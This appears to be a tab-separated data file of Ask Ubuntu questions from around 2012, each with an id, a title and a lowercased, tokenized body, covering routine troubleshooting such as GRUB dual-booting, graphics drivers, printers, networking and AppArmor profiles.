0.18.1.1-9ubuntu1 is to be installed . gettext : i386 : conflicts : gettext but 0.18.1.1-9ubuntu1 is installed . the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) gettext : i386 [ not installed ] 2 ) gettext-base : i386 [ not installed ] leave the following dependencies unresolved : 3 ) wine1.5-i386 : i386 recommends gettext : i386
220173	vim - make a mapping applicable only if the file name contains specific characters	say , i want a specific vim mapping to be applicable only if the file name ( better still , path ) contains specific characters -- - irrespective of filetype . can this be done ? how ? or am i asking for too much ?
220185	how to install 12.04 on a pendrive ?	all i want to do is , install ubuntu onto a pendrive , so that i do n't need to use my internal hdd . another motto is to install packages on ubuntu , in pendrive ( so i do n't want to use the 'live pendrive ' thing ) i installed it on the pendrive , and selected the boot installation to dev/sdd1 . but when i boot the pendrive , it says 'missing operating system' also , one more question , can the same pendrive be booted on any other computer ?
220189	ubuntu 12.04 on mbpro , early 2011 , options	i have a 2.2 ghz i7 , 4gb macbook pro 8.3 , amd radeon hd 6750m 1024 mb , early 2011 . as far as i see i have two options , running ubuntu on this hardware : vmware/virtualbox and ubuntu in a vm , i already ordered a 16g ram upgrade for this . wipe osx and go ubuntu native , with 16g ram , yay ! i 'm kinda leaning towards option 2 as i tend to spend 90 % of my time in dev vm 's at work anyway . all my other machines at home , and most at work are ubuntu/linux as well . i have a mac mini on standby for the odd itunes backup/sync . if i do n't have to keep osx around , i would like to get rid of it altogether . ubuntu support on mac hardware seems to be a hit and miss affair as far as i can tell . does anyone have good success running a recent version of ubuntu on this hardware ? thanks
220193	how to play back multiple videos , stopping after each one ?	i want to watch a number of trailers and make notes inbetween each one . so , instead having them play one after the other without stopping , i want each one to automatically stop once it 's done , and then i 'll hit a key to play the next one in the playlist . how do i do this ?
220199	is there any custom command indicator	basically i would like to have an indicator that will run and display the output of a custom command ( like uptime ) or script ( self-written ) , just like xubuntu have one .
220203	will upgrading from 11.10 to 12.04 restore unity ?	yesterday , i upgraded my ubuntu 11.04 tot 11.10 . after some trouble i managed to remove unity and i installed gdm & gnome-shell as a replacement . i configured it a bit : installed some extensions , changed some themes , etc ... my question now is : what will happen if i upgrade my 11.10 to 12.04 ( and afterwards to 12.10 ) ? will unity get reinstalled and if so : will i lose all my gdm modifications ? thanks in advance !
220206	will wayland finally make it as system composer in 13.04 ?	ubuntu has been talking about moving to wayland for around 2 years . they even had some actual attempt to make it system composer for 12.10 . it failed as wayland was n't ready . but now wayland folks released a stable release and they 'll keep backward compatibility from that point . i 'm really hoping to see wayland making its way in the base install of ubuntu 13.04 . what are the chances of this happening ?
220208	login wallpaper spanning dual monitors in 12.04	is there a way to make the background on the login screen span dual monitors rather than being mirrored ? i know it 's possible for the actual wallpaper when you 're logged in but ca n't find an option for the login background .
220213	why does n't ubuntu have any media codecs ?	i 'm having some doubt regarding media codec 's in ubuntu . my question is why lubuntu shipped with all the necessary medic codec and at the same time ubuntu/xubuntu do n't have any ?
220215	how do i copy and paste in a signed app in firefox ( ubuntu ) ?	i 'm trying to use a cms ( ceasy ) from firefox on ubuntu and running into problems when i try to cut/copy/paste into a rich text editor field there . a window pops up informing me that this is due to the site 's use of a signed app and telling me to change the following configuration : in about : config , set signed.applets.codebase_principal_support to true . however , doing so does not change anything . i 'm asking this question here because this works fine in ff ( windows ) and seems to be a more specific problem of firefox on ubuntu . any ideas ?
220221	how to do alt+ tab for main system while in vbox ?	i have recently gone through this issue . i am running lubuntu 13.04 in virtualbox .so when i have maximized and if i would like switch to next window of main system usually we all do alt+tab but thats not getting for main system and going for vbox 's lubuntu . so how can i get activated main system alt+tab functionality even i have a maximized virtaulbox operating system . thank you .
220223	constant noise in speakers and headphones	on my laptop , samsung 300v5a-s19 i have the constant noise from the speakers . if i wear headphones , the sound becomes more pronounced ( at half volume it mutes the music ) . the noise level is independent of the volume control . the noise disappears only when volume is completely muted . for the record , the sound is reminiscent of the noise of the waves or something like that . system information : ubuntu 12.10 , kernel 3.5.0-18 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 04 ) all packages in the system updated . ps : following the advice from this message ( click ) yielded no result .
220225	how can i print-screen just one window and not my entire desktop ?	i could swear i 've always been able to do alt+print screen to get 'just that window ' but right now i am getting my entire desktop . any idea why this would be or what i can do to get my ability to do small window screen shots ? i 've tried a lot of combination with the ctrl , alt , shift and print screen keys , but no luck , nothing happens in response . one option : shift+ctrl+print screen lets me do a selection using a cross hair to size out the screen capture but i do n't know where this gets saved . i 'm not being given the choice and it 's not in desktop or pictures . i use an external keyboard , but i 've tried using the laptop 's own keyboard and no difference . i am running ubuntu 12.04 and the laptop is a samsung ultrabook 900 update : i rebooted and it `` fixed '' it - for now . however this is not the first time i 've seen this so i 'm still curious as to why it happens , what i can do to fix w/o reboot and if other share the same problem .
220228	how do i remove pwd from terminal ?	how do i remove the pwd from the terminal ? i 'm not referring to the command but the automatic display next to my username @ hostname . i would like it to work more like it does on other distros . thank you .
220230	what packages do i remove to get a command line only mode ?	i was attempting to install a command line only version of ubuntu and followed the instructions here . i downloaded the alternate cd and went through the installation , but never got an `` install a command-line system . '' option . 12.04 is now up and running , though i do n't need the desktop gui . from what i have read i can set it back into text mode using grub , but what packages should i remove that i do n't need any more ?
220231	ubuntu one session does n't start in windows 7	i 'm having problems with the login from windows 7 . i 've tried on two different computers and it would not let me start a session . i come to you to help me solve this problem . both computers have the same operating system ; as you can see , in the linked image are the specs of my pc . thank you very much in advance for your help . original ( untranslated ) : hola personal de ubuntu mi nombre es eder bohorquez y soy de colombia tengo problemas con el inicio de sesion desde windows 7 ya he probado en dos diferentes computadores y no me ha dejado iniciar sesion acudo a ustedes para que me ayuden a resolver este inconveniente . especificaciones pc ambos computadores tienen el mismo sistema operativo instalado , como se puede apreciar en la imagen son las especificaciones de mi pc . de antemano muchas gracias por su colaboracion .
220240	how to make archive manager recognize cyrillic chracters ?	i have some files with russian titles that are archived in a .rar file . when extracting them with the archive manager in lubuntu , their names contained odd characters and the comment ( invalid encoding ) after extension . when i extracted them with 7-zip ( installed in wine ) their original cyrillic names were kept correctly . how can i make my lubuntu archive manager do that ?
220242	why is there no apparmor profile for the terminal ?	i understand that apparmor profiles are useful for securing programs that have access to the internet . hence the question . i do n't see any `` terminal '' -related profile here .
220250	fresh ubuntu 12.10 install no desktop or wing bar	after a fresh installm of ubuntu 12.10 ( complete erase ) after logging in it appears i have no taskbar or much of anything , although i can still execute my terminal with ctrl+alt+t . i looked around a little , seems i 'm not the only person who has had this problem . i found here : http : //ubuntuforums.org/showthread.php ? p=12303179 # post12303179 from there , i found myself here : https : //bugs.launchpad.net/ubuntu/+source/nvidia-graphics-drivers-updates/+bug/1068341 i followed precisely the instructions provided which were : this problem is solved this way switch to a terminal ( ctrl-alt-f1 ) . login as your username . install linux source ( sudo apt-get install linux-source ) and headers ( sudo apt-get install linux-headers-3.5.0-17-generic ) . uninstall nvidia driver - this depends on which version you installed ( sudo apt-get remove nvidia-current or sudo apt-get remove nvidia-current-updates or sudo apt-get remove nvidia-experimental-304 ) . reinstall nvidia driver ( sudo apt-get install nvidia-current-updates ) . if it successfully installs , restart the computer ( sudo shutdown -r now ) . source desktop does not show when i installed nvidia drivers ! i have rebooted , and i am still having the exact same problem . so i back at square one . can someone help me please ? this is my room mates computer and i told him i was `` fixing '' it and now i feel like i 've ruined it . any help is greatly appreciated . thank you for your time .
220251	compiz cpu usage is very high	i know i am far from the first one to ask this question , but i have a new 12.10 64-bit install , and the cpu usage for compiz is terrible . i am guessing my quad core would explain the 300 % usage on top . i have tried installing ccsm and setting sync to vblank off , and the strace described in another link ( it locked up my machine ) i have an amd hd7770 card ( cape verde ) . is there any late breaking news on how to address this problem , that i may have missed ? thanks this is the result of lspci : 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati cape verde [ radeon hd 7700 series ] ( prog-if 00 [ vga controller ] ) subsystem : dell device 2304 flags : bus master , fast devsel , latency 0 , irq 46 memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at f7d00000 ( 64-bit , non-prefetchable ) [ size=256k ] i/o ports at e000 [ size=256 ] expansion rom at f7d40000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : radeon kernel modules : radeon
220255	how do i backup system properly ?	how do i backup my system so that if i do backup today , tomorrow when i recover it it 's totally the same as yesterday ? i mostly care bout system itself , programs and documents are not that important but still would be nice to keep programs+settings for them . i need it in case i do something dumb : purge needed package , mess up linux-headers , repository , tweak registry and fail and so on . examples : messed up with xconf and it 's not working . used gconf-editor , did some changes and forgot where i did them , gconf-editor does n't have undo or `` do n't save '' feature , so i am wondering what the hell did i change ? and so on . and so on , one more thousand stupid mistakes of a guy who is noob at ubuntu but likes it and wants to become pro : )
220257	control fan speed	my laptop works fine in ubuntu but temperatures are higher than the rare cases i use windows . if there a way to tell ubuntu to turn the fan on earlier ? i 'm on ubuntu 12.10 amd64 on a toshiba r830 laptop .
220259	will wubi overwrite existing data ?	i 'm curious to try this , alas , i do n't want to lose existing data . will the wubi install wipe my harddrive or will it install and run just like any other program ?
220263	where is the wireless connection wizard in12.10 ?	i accidentally deleted my wireless connection , and now i ca n't find a simple wizard to choose my ap and connect to it . the best i got was clicking the network icon in the toolbar and clicking `` edit connections '' , but clicking `` add '' in the wireless tab prompts me for a bunch of information which i do n't know . the help file section on connect to a wireless network says : click the network menu in the menu bar , and click the name of the network you want to connect to . what is this menu bar of which they speak ? i 'm using unity and i have n't changed much since installing 12.10 , but now i 'm lost . what i want is a window that shows me all the wireless networks in range and allows me to choose mine , enter the password and be connected . that is how i set it up during the installation in the first place .
220265	open ubuntu 'disks ' in sudo mode ?	i have the annoying problem with 12.10 that it lists the extended partition containing my swap in nautilus ( labeled `` ubuntu 12.10 i386 '' ) , so i want to open up disks to check off the 'show in user interface ' option , only it 's grey 'd out . is there a way to open disks as sudo so i can check off that option ?
220266	will amd continue to update the legacy fglrx driver ?	i have a ati/amd hd3450 , and clearly it 's not supported by the proprietary drivers in 12.10 . however , there is a legacy driver , which is also not supported at this time . is this legacy driver kept up to date from time to time , so that i will be able to use it at some time in the future ? or must i remain with the open source drivers if i do n't also wish to downgrade x ?
220271	no glx on intel card with multiseat with additional nvidia card	i have multiseat configured and my xorg has 2 server layouts . one is for nvidia card and other is for intel card . they both work , but display server assigned to intel card does n't have hardware acceleration since dri and glx module being used is from nvidia driver . so my question is , can i configure layouts somehow to use right dri and glx with each card ? my xorg.conf : section `` serverlayout '' identifier `` default '' screen 0 `` screen0 '' 0 0 option `` xinerama '' `` 0 '' endsection section `` serverlayout '' identifier `` tv '' screen 0 `` screen1 '' 0 0 option `` xinerama '' `` 0 '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` dell e198wfp '' horizsync 30.0 - 83.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` unknown '' option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 610 '' endsection section `` device '' identifier `` device1 '' driver `` intel '' busid `` pci:0:2:0 '' option `` accelmethod '' `` uxa '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-1 '' option `` metamodes '' `` dfp-0 : nvidia-auto-select +1440+0 , dfp-1 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection log file for intel : [ 18.239 ] x.org x server 1.13.0 release date : 2012-09-05 [ 18.239 ] x protocol version 11 , revision 0 [ 18.239 ] build operating system : linux 2.6.24-32-xen x86_64 ubuntu [ 18.239 ] current operating system : linux bytewiper 3.5.0-18-generic # 29-ubuntu smp fri oct 19 10:26:51 utc 2012 x86_64 [ 18.239 ] kernel command line : boot_image=/boot/vmlinuz-3.5.0-18-generic root=uuid=fc0616fd-f212-4846-9241-ba4a492f0513 ro quiet splash [ 18.239 ] build date : 20 september 2012 11:55:20am [ 18.239 ] xorg-server 2:1.13.0+git20120920.70e57668-0ubuntu0ricotz ( for technical support please see http : //www.ubuntu.com/support ) [ 18.239 ] current version of pixman : 0.26.0 [ 18.239 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 18.239 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 18.239 ] ( == ) log file : `` /var/log/xorg.1.log '' , time : wed nov 21 18:32:14 2012 [ 18.239 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 18.239 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 18.239 ] ( ++ ) serverlayout `` tv '' [ 18.239 ] ( ** ) | -- > screen `` screen1 '' ( 0 ) [ 18.239 ] ( ** ) | | -- > monitor `` monitor1 '' [ 18.240 ] ( ** ) | | -- > device `` device1 '' [ 18.240 ] ( ** ) option `` xinerama '' `` 0 '' [ 18.240 ] ( == ) automatically adding devices [ 18.240 ] ( == ) automatically enabling devices [ 18.240 ] ( == ) automatically adding gpu devices [ 18.240 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 18.240 ] entry deleted from font path . [ 18.240 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 18.240 ] entry deleted from font path . [ 18.240 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 18.240 ] entry deleted from font path . [ 18.240 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 18.240 ] entry deleted from font path . [ 18.240 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 18.240 ] entry deleted from font path . [ 18.240 ] ( ww ) the directory `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' does not exist . [ 18.240 ] entry deleted from font path . [ 18.240 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 18.240 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 18.240 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 18.240 ] ( ii ) loader magic : 0x7f6917944c40 [ 18.240 ] ( ii ) module abi versions : [ 18.240 ] x.org ansi c emulation : 0.4 [ 18.240 ] x.org video driver : 13.0 [ 18.240 ] x.org xinput driver : 18.0 [ 18.240 ] x.org server extension : 7.0 [ 18.240 ] ( ii ) config/udev : adding drm device ( /dev/dri/card0 ) [ 18.241 ] ( -- ) pci : ( 0:0:2:0 ) 8086:0152:1043:84ca rev 9 , mem @ 0xf7400000/4194304 , 0xd0000000/268435456 , i/o @ 0x0000f000/64 [ 18.241 ] ( -- ) pci : * ( 0:1:0:0 ) 10de:104a:1458:3546 rev 161 , mem @ 0xf6000000/16777216 , 0xe0000000/134217728 , 0xe8000000/33554432 , i/o @ 0x0000e000/128 , bios @ 0x ? ? ? ? ? ? ? ? /524288 [ 18.241 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 18.241 ] initializing built-in extension generic event extension [ 18.241 ] initializing built-in extension shape [ 18.241 ] initializing built-in extension mit-shm [ 18.241 ] initializing built-in extension xinputextension [ 18.241 ] initializing built-in extension xtest [ 18.241 ] initializing built-in extension big-requests [ 18.241 ] initializing built-in extension sync [ 18.241 ] initializing built-in extension xkeyboard [ 18.241 ] initializing built-in extension xc-misc [ 18.241 ] initializing built-in extension security [ 18.241 ] initializing built-in extension xinerama [ 18.241 ] initializing built-in extension xfixes [ 18.241 ] initializing built-in extension render [ 18.241 ] initializing built-in extension randr [ 18.241 ] initializing built-in extension composite [ 18.241 ] initializing built-in extension damage [ 18.241 ] initializing built-in extension mit-screen-saver [ 18.241 ] initializing built-in extension double-buffer [ 18.241 ] initializing built-in extension record [ 18.241 ] initializing built-in extension dpms [ 18.241 ] initializing built-in extension x-resource [ 18.241 ] initializing built-in extension xvideo [ 18.241 ] initializing built-in extension xvideo-motioncompensation [ 18.241 ] initializing built-in extension xfree86-vidmodeextension [ 18.241 ] initializing built-in extension xfree86-dga [ 18.241 ] initializing built-in extension xfree86-dri [ 18.241 ] initializing built-in extension dri2 [ 18.241 ] ( ii ) loadmodule : `` glx '' [ 18.241 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/libglx.so [ 18.247 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 18.247 ] compiled for 4.0.2 , module version = 1.0.0 [ 18.247 ] module class : x.org server extension [ 18.247 ] ( ii ) nvidia glx module 310.19 thu nov 8 01:12:43 pst 2012 [ 18.247 ] loading extension glx [ 18.247 ] ( ii ) loadmodule : `` intel '' [ 18.248 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 18.248 ] ( ii ) module intel : vendor= '' x.org foundation '' [ 18.248 ] compiled for 1.13.0 , module version = 2.20.13 [ 18.248 ] module class : x.org video driver [ 18.248 ] abi class : x.org video driver , version 13.0 [ 18.248 ] ( ii ) intel : driver for intel integrated graphics chipsets : i810 , i810-dc100 , i810e , i815 , i830m , 845g , 854 , 852gm/855gm , 865g , 915g , e7221 ( i915 ) , 915gm , 945g , 945gm , 945gme , pineview gm , pineview g , 965g , g35 , 965q , 946gz , 965gm , 965gme/gle , g33 , q35 , q33 , gm45 , 4 series , g45/g43 , q45/q43 , g41 , b43 , b43 , clarkdale , arrandale , sandybridge desktop ( gt1 ) , sandybridge desktop ( gt2 ) , sandybridge desktop ( gt2+ ) , sandybridge mobile ( gt1 ) , sandybridge mobile ( gt2 ) , sandybridge mobile ( gt2+ ) , sandybridge server , ivybridge mobile ( gt1 ) , ivybridge mobile ( gt2 ) , ivybridge desktop ( gt1 ) , ivybridge desktop ( gt2 ) , ivybridge server , ivybridge server ( gt2 ) , haswell desktop ( gt1 ) , haswell desktop ( gt2 ) , haswell desktop ( gt2+ ) , haswell mobile ( gt1 ) , haswell mobile ( gt2 ) , haswell mobile ( gt2+ ) , haswell server ( gt1 ) , haswell server ( gt2 ) , haswell server ( gt2+ ) , haswell sdv desktop ( gt1 ) , haswell sdv desktop ( gt2 ) , haswell sdv desktop ( gt2+ ) , haswell sdv mobile ( gt1 ) , haswell sdv mobile ( gt2 ) , haswell sdv mobile ( gt2+ ) , haswell sdv server ( gt1 ) , haswell sdv server ( gt2 ) , haswell sdv server ( gt2+ ) , haswell ult desktop ( gt1 ) , haswell ult desktop ( gt2 ) , haswell ult desktop ( gt2+ ) , haswell ult mobile ( gt1 ) , haswell ult mobile ( gt2 ) , haswell ult mobile ( gt2+ ) , haswell ult server ( gt1 ) , haswell ult server ( gt2 ) , haswell ult server ( gt2+ ) , haswell crw desktop ( gt1 ) , haswell crw desktop ( gt2 ) , haswell crw desktop ( gt2+ ) , haswell crw mobile ( gt1 ) , haswell crw mobile ( gt2 ) , haswell crw mobile ( gt2+ ) , haswell crw server ( gt1 ) , haswell crw server ( gt2 ) , haswell crw server ( gt2+ ) , valleyview po board [ 18.248 ] ( ++ ) using vt number 8 [ 18.593 ] ( ii ) intel ( 0 ) : using device path '/dev/dri/card0' [ 18.593 ] ( ** ) intel ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 18.593 ] ( == ) intel ( 0 ) : rgb weight 888 [ 18.593 ] ( == ) intel ( 0 ) : default visual is truecolor [ 18.593 ] ( ** ) intel ( 0 ) : option `` accelmethod '' `` uxa '' [ 18.593 ] ( -- ) intel ( 0 ) : integrated graphics chipset : intel ( r ) ivybridge desktop ( gt1 ) [ 18.593 ] ( ** ) intel ( 0 ) : relaxed fencing enabled [ 18.593 ] ( ** ) intel ( 0 ) : wait on swapbuffers ? enabled [ 18.593 ] ( ** ) intel ( 0 ) : triple buffering ? enabled [ 18.593 ] ( ** ) intel ( 0 ) : framebuffer tiled [ 18.593 ] ( ** ) intel ( 0 ) : pixmaps tiled [ 18.593 ] ( ** ) intel ( 0 ) : 3d buffers tiled [ 18.593 ] ( ** ) intel ( 0 ) : swapbuffers wait enabled ... [ 20.312 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 20.312 ] compiled for 1.13.0 , module version = 1.0.0 [ 20.312 ] abi class : x.org ansi c emulation , version 0.4 [ 20.312 ] ( ii ) loading sub module `` dri2 '' [ 20.312 ] ( ii ) loadmodule : `` dri2 '' [ 20.312 ] ( ii ) module `` dri2 '' already built-in [ 20.312 ] ( == ) depth 24 pixmap format is 32 bpp [ 20.312 ] ( ii ) intel ( 0 ) : [ dri2 ] setup complete [ 20.312 ] ( ii ) intel ( 0 ) : [ dri2 ] dri driver : i965 [ 20.312 ] ( ii ) intel ( 0 ) : allocated new frame buffer 1920x1080 stride 7680 , tiled [ 20.312 ] ( ii ) uxa ( 0 ) : driver registered support for the following operations : [ 20.312 ] ( ii ) solid [ 20.312 ] ( ii ) copy [ 20.312 ] ( ii ) composite ( render acceleration ) [ 20.312 ] ( ii ) put_image [ 20.312 ] ( ii ) get_image [ 20.312 ] ( == ) intel ( 0 ) : backing store disabled [ 20.312 ] ( == ) intel ( 0 ) : silken mouse enabled [ 20.312 ] ( ii ) intel ( 0 ) : initializing hw cursor [ 20.312 ] ( ii ) intel ( 0 ) : randr 1.2 enabled , ignore the following randr disabled message . [ 20.313 ] ( ** ) intel ( 0 ) : dpms enabled [ 20.313 ] ( == ) intel ( 0 ) : intel xvmc decoder enabled [ 20.313 ] ( ii ) intel ( 0 ) : set up textured video [ 20.313 ] ( ii ) intel ( 0 ) : [ xvmc ] xvmc_vld driver initialized . [ 20.313 ] ( ii ) intel ( 0 ) : direct rendering : dri2 enabled [ 20.313 ] ( == ) intel ( 0 ) : hotplug detection : `` enabled '' [ 20.332 ] ( -- ) randr disabled [ 20.335 ] ( ee ) failed to initialize glx extension ( compatible nvidia x driver not found ) [ 20.335 ] ( ii ) intel ( 0 ) : setting screen physical size to 508 x 285 [ 20.338 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 20.340 ] ( ii ) config/udev : adding input device power button ( /dev/input/event1 ) [ 20.340 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 20.340 ] ( ii ) loadmodule : `` evdev '' [ 20.340 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so
220272	upgrade from ubuntu 12.04.1 lts to 12.10 desktop does not work	upgrade from ubuntu 12.04.1 lts to 12.10 does not work . do not get upgrade option .
220274	juju override defaults in service	working on the postgresql charm a bit , and i 'm wondering if there is a way to supply overrides for default values in a `` juju-way '' . in my charm that will be consuming the services provided by postgresql , i was thinking i could override things like the database name , or the name of the super_user created . if i stick something like this in the relation-joined : relation-set user=my_superuser i 'm having an issue where the postgres/db-admin-relation-changed can actually run before the consumer joins runs ( or finishes running at least ) . eventually , the postgresql/db-admin-relation-changed will run and get my data , but if it runs too quickly , i could wind up with 2 superusers . tl ; dr : is there a way to guarantee that default configuration is overridden in a service on the provides side of the relationship ?
220275	grub2 - finding an encrypted debian	i have a triple-boot-system , with windows 7 , ubuntu 12.10 and crunchbang ( a debian derivative - unstable debian at that ) . i am trying to get all encrypted : windows with truecrypt fde , chaining grub on an extra boot partition with the windows bootloader on mbr . since ubuntu cut out the encryption option ( none in ubiquity and no alternate install ) , ubuntu is not encrypted . crunchbang though is . my partition map looks thus as follows : sda1 : win7 sda2 : win7-boot junk ( installed it by default - what is that anyway ? ! ) sda3 : /boot sda4 : ubuntu sda5 : encrypted - > sda8 ( ? ) : crunchbang sda6 : encrypted - > sda9 ( ? ) : swap sda7 : another ext4 thing is , after installation , i could boot windows and crunchbang fine . update-grub however printed out that he found ubuntu , no crunchbang but after reboot he just gave me crunchbang . reinstalled ubuntu , including grub on sda3 . now he only finds ubuntu . the latter i think is quite obvious , how should grub find an encrypted os ? but could someone explain to me how i can dual-boot two ( in theory encrypted ) linux 's with grub2 ?
220276	where can i find apparmor profiles ?	i 'm interested in using apparmor to secure my laptop , and i am wondering if there is a place where i can find apparmor profiles for firefox and other desktop programs .
220279	how can i use the unused space in my hdd and restore it back to original form ? ? does gparted tool help ?	i installed a couple of ubuntu versions previously only to be deleted or unused leaving the allocated space they used haunted.using a tool like gparted how can i merge all those pieces into my original hdd space which was 500gb.below is the picture of how it looks.help needed very badly .
220282	how to solve the link library problem -lgcc_s	i am trying to compile a script with gcc on my ubuntu system and get this error : /usr/bin/ld : can not find -lgcc_s how can i fix this problem ?
220290	photos not appearing in dash home , photo lense	if i load up ''dash home '' then click on the ''camera '' photo lense , to view photos or search for photos it says theres no photos that match my search . but if i search under the ''home/house '' icon photos are found . movies and music work perfect . any one know how to solve it . thanks
220291	two different ubuntu versions dual-boot problem	i have 2 ubuntus installed : 12.04 and 6.10 after i installed the second one - 6.10 , the first one ( 12.04 ) became invisible in grub . then i booted from the 12.04 live cd and followed this http : //www.howopensource.com/2012/05/reinstall-recover-grub-from-ubuntu-12-04-live-cd-usb/ article to restore the complete grub using `` boot-repair '' utility . both versions kernels appeared in the list , 12.04 booted fine , but 6.10 became unbootable ! simply when i chose any of them , the system restarts immediately . here is an example of grub entry for this : ubuntu , kernel 2.6.17-12-generic ( on /dev/sda2 ) insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos2 ) ' search -- no-floppy -- fs-uuid -- set=root f13c4d37-cf48-4e03-91b2-4f4da43a7d73 linux /boot/vmlinuz-2.6.17-12-generic root=/dev/hda2 ro quiet splash initrd /boot/initrd.img-2.6.17-12-generic when i change root=/dev/hda2 to root=/dev/sda2 it stops from restarting , but it shows nothing but a command prompt and stops . i have also tried removing `` ro quiet splash '' to see any errors with no luck . i believe this has something to do with sda/hda thing in different ubuntu versions , but have not had a luck after hours of searching to determine the solution ! here is the output of `` boot info script '' : http : //pastebin.com/raw.php ? i=pvmdhkax ( could n't figure out how to correctly attach it here ) . thanks for looking .
220292	ethernet connection unavailable	i 'm running ubuntu server 12.04 on a laptop with an intel nic ( driver e1000e ) . when i connect the ethernet port to the internet ( college network , dhcp ) it works out of the box . now i 'm trying to connect it to a networked usrp ( if you want to know what it is ) . a friend of mine managed to do this in his laptop ( running regular ubuntu 12.04 ) just by setting up a new wired connection in the network manager with appropriate addresses . however , when i do the same , no wired connections are available . the output of nmcli -p dev is =========================================== status of devices =========================================== device type state -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - wlan0 802-11-wireless connected eth0 802-3-ethernet unavailable but the cable is connected to the device and the device is powered up . any idea how to solve this ? update : after stopping the network-manager service , setting up the connection manually and starting the service again , it now detects the ethernet connection . however , the device still ca n't receive data and does n't answer to pings . update 2 : as suggested i tried using a cross over cable but the result is exactly the same . however , i found out that connecting the device to the dock ( as opposed to directly to the laptop ) works fine . i know that the ethernet port in the laptop works fine , because connecting to the network through it works . is it possible that the port in the laptop does n't support gb ethernet ( because that 's what the device requires ) but the one in the dock does ?
220294	can not install preload from the terminal	i am an ubuntu novice . i can not download preload from the terminal . when i input : sudo apt-get install preload it gives me this message : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package preload any ideas why this might be happening ?
220295	rhythmbox pause/resume with space key	i am currently using rhythmbox on ubuntu 12.10 , and i like it in all aspects , except for one -- space key 's function . currently space key starts the current song from the beginning , which i have seen only on rhythmbox . usually space key pauses or resumes the playback , and that 's what i am used to and would like it to do . i have n't found a setting for that , but i am pretty sure there must be a setting for it somewhere . so how could i make space bar pause/resume the playback ?
220296	xerox workcentre 3045 not printing	my brother bought a xerox workcentre 3045 printer , but even after intalling the drivers i ca n't get it to work . it is a wireless printer , and is detected when going to printers , installing it works , but it just wo n't print . i have n't tried connecting it with usb . printing a test page from the setup wizard makes the printer state `` idle - processing page 1 ... '' going to `` http : //localhost:631/ '' ( cups ) shows the printer there , but the job state is 'stopped `` filter failed '' ' . the cups page says the printer is connected on socket : //10.0.0.65:9100 any help would be greatly appreciated
220300	locating postgres database	i am working on this new ubuntu 12.04 server and i need to work on the postgres database which is postgis enabled . the problem is i am not sure how to locate the database using command line . it is already installed on the server . i just need to locate it . how do i locate it ?
220302	startup message : bad lun ( 0:1 ) , bad target number ( 1:0 ) , etc	i am a newcomer to linux . i installed ubuntu 12.04.1 on acer aspire one d270 ( spec = atom n2600 1.6 ghz cpu , 2gb ram , 320 gb hd ) . everything seems to be running ok , albeit in the 2d mode . but before the ubuntu loading screen appears , the following message appears on the screen : [ 11.935202 ] bad lun ( 0:1 ) [ 11.935477 ] bad target number ( 1:0 ) [ 11.935744 ] bad target number ( 2:0 ) [ 11.936007 ] bad target number ( 3:0 ) [ 11.936272 ] bad target number ( 4:0 ) [ 11.936599 ] bad target number ( 5:0 ) [ 11.936802 ] bad target number ( 6:0 ) [ 11.937046 ] bad target number ( 7:0 ) what does this message mean ? should i be concerned about this ?
220303	how to remove unity icon gloss	i recently installed the nitrux–umd icon theme , and i 'm wondering how to turn off the unity gloss that 's being applied over the unity bar icons . this is how it looks— this is how it should look—
